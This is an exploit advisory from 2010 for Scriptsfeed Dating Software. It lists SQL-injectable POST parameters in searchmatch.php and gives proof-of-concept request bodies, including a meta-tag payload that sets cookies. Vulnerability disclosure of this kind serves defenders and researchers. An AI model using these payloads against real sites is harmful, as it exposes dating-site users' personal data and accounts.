==============================================================================
    [~] Scripts Feed Dating Software (Cookie Manip/SQLi) Multiple Remote Vulnerabilities
==============================================================================
    [+] My home          [ http://hack-tech.com ]
    [+] Date Submitted:  [ February 27 2010 ]
    [+] Founder:         [ Crux ]
    [+] Vendor:          [ Scriptsfeed ]
    [+] Version:         [ ALL ]
    [+] Download:        [ http://www.scriptsfeed.com/dating-software.htmll ]

~ SQLi
------------------------------------------------------------------------
[ EXPLOIT ]
- This vulnerability affects searchmatch.php
-The POST variables 'txtlookgender' and 'txtgender' are vulnerable.

[ POC ]
1.

txtgender=${injectHere}&txtlookgender=F&txtlookagestart=16&txtlookageend=16&with_photo=on
2.

txtgender=M&txtlookgender=${injectHere}&txtlookagestart=16&txtlookageend=16&with_photo=on


~ Cookie Manipulation
------------------------------------------------------------------------
[ EXPLOIT ]
- This script is vulnerable to Cookie manipulation attacks.
- This vulnerability affects searchmatch.php

By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser.

[ POC ]
txtgender=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&txtlookgender=M&txtlookagestart=16&txtlookageend=16&with_photo=on
==============================================================================


________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.<https://signup.live.com/signup.aspx?id=60969>